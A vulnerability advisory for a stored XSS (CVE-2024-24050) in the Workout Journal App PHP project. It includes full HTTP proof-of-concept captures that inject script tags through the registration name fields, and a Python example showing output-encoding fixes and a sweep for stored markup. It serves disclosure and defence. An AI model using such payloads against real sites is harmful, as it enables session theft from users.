# Exploit Title: Workout Journal App 1.0 - Stored XSS
# Date: 12.01.2024
# Exploit Author: Murat Cagri Alis
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html
# Version: 1.0
# Tested on: Windows/MacOS/Linux
# CVE: CVE-2024-24050
# Description
Install the application's source code and run it on localhost. Register through the registration page at workout-journal/index.php. During registration, a stored XSS payload can be entered in the first name and last name fields of that page: in the request sent to /workout-journal/endpoint/add-user.php, set the first_name parameter to '<script>console.log(document.cookie)</script>' and the last_name parameter to '<script>console.log(1337)</script>'. After logging in you are redirected to /workout-journal/home.php; opening the browser console there shows the stored XSS executing, and the payload is also visible unencoded in the page source. The vulnerability exists because user-supplied data is stored without validation and later written into the page without output encoding, so the browser executes it as script.
# PoC
Registration request to /workout-journal/endpoint/add-user.php

POST /workout-journal/endpoint/add-user.php HTTP/1.1
Host: localhost
Content-Length: 268
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vci
Connection: close

first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=test123456
The response to this request comes back with status code 200:

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:05:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Content-Length: 214
Connection: close
Content-Type: text/html; charset=UTF-8

<script>
alert("Successfully registered account!");
window.location.href = 'http://localhost/workout-journal/';
</script>

After this, go to the login page and log in with the registered username and password. Once logged in, the payload can be seen executing in the console.
Request to /workout-journal/home.php

GET /workout-journal/home.php HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: http://localhost/workout-journal/endpoint/login.php
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1
Connection: close
Response from /workout-journal/home.php

HTTP/1.1 200 OK
Date: Sat, 16 Mar 2024 02:07:56 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4
X-Powered-By: PHP/8.1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 2791
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Workout Journal App</title>
<!-- Style CSS -->
<link rel="stylesheet" href="./assets/style.css">
<!-- Bootstrap CSS -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css">
<style>
body {
overflow: hidden;
}
</style>
</head>
<body>
<div class="main">
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand ml-3" href="#">Workout Journal App</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="navbar-nav ml-auto">
<li class="nav-item active">
<a class="nav-link" href="./endpoint/logout.php">Log out</a>
</li>
</ul>
</div>
</nav>
<div class="landing-page">
<div class="title-range">
<h2>WELCOME <script>console.log(document.cookie);</script> <script>console.log(1337);</script></h2>
<p>What do you want to do today?</p>
</div>
<div class="select-option">
<div class="read-journal" onclick="redirectToReadJournal()">
<img src="./assets/read.jpg" alt="">
<p>Read your past workout journals.</p>
</div>
<div class="write-journal" onclick="redirectToWriteJournal()">
<img src="./assets/write.jpg" alt="">
<p>Write your journal for today.</p>
</div>
</div>
</div>
</div>
<!-- Bootstrap JS -->
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@[email protected]/dist/umd/popper.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.min.js"></script>
<!-- Script JS -->
<script src="./assets/script.js"></script>
</body>
</html>
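The root cause described above (names stored as submitted and later concatenated raw into the <h2> of home.php) and its fix can be shown in a few lines. The block below is an added example written for this advisory; it is not code from the Workout Journal App, and the template fragment, the name-validation policy and the trimmed copy of the PoC form body are assumptions. It decodes the registration body the way $_POST would, renders the welcome heading once with the defect and once with HTML-context output encoding (the PHP equivalent of htmlspecialchars($name, ENT_QUOTES, 'UTF-8')), and includes a helper that sweeps an already-stored user record for fields containing markup, which is what a defender needs after patching, since rows written before the fix still carry the payload.

```python
"""Added example: how the Workout Journal stored XSS arises and how output
encoding neutralises it. Not code from the project; its real templates and
field handling are not reproduced here."""
import html
import re
from urllib.parse import parse_qs

# Constructed copy of the advisory's registration body, trimmed to the
# fields relevant to the bug. The two payloads are the ones from the PoC.
POC_BODY = (
    "first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E"
    "&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E"
    "&username=testusername"
)

# Start of an HTML tag or comment: "<" followed by a letter, "/" or "!".
TAG_START = re.compile(r"<[A-Za-z/!]")


def parse_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single-valued
    fields, which is what PHP exposes through $_POST."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_welcome_vulnerable(first_name: str, last_name: str) -> str:
    """Reproduces the defect visible in the home.php response: the stored
    names are concatenated into the <h2> without any encoding."""
    return f"<h2>WELCOME {first_name} {last_name}</h2>"


def render_welcome_fixed(first_name: str, last_name: str) -> str:
    """Same fragment with HTML-context output encoding. The data is stored
    unchanged; it is made inert at the point where it enters the document."""
    return (
        f"<h2>WELCOME {html.escape(first_name, quote=True)} "
        f"{html.escape(last_name, quote=True)}</h2>"
    )


def name_is_acceptable(value: str) -> bool:
    """Defence-in-depth input check for a person-name field (hypothetical
    policy: 1-64 characters, no angle brackets). Output encoding above is
    the actual fix; this only reduces what reaches the database."""
    return 1 <= len(value) <= 64 and "<" not in value and ">" not in value


def fields_with_markup(record: dict) -> list:
    """Sweep a stored user record (for example a row written before the fix
    was deployed) and report which fields contain something tag-like."""
    return [name for name, value in record.items() if TAG_START.search(value)]


if __name__ == "__main__":
    form = parse_form(POC_BODY)
    print("decoded first_name:", form["first_name"])
    print("vulnerable:", render_welcome_vulnerable(form["first_name"], form["last_name"]))
    print("fixed:     ", render_welcome_fixed(form["first_name"], form["last_name"]))
    print("fields to review:", fields_with_markup(form))
```

Running the block prints the welcome heading both ways: the vulnerable form contains the two script elements verbatim, the fixed form contains only `&lt;script&gt;` entities that the browser displays as text. The sweep helper is the part to run against existing data after deploying the encoding fix.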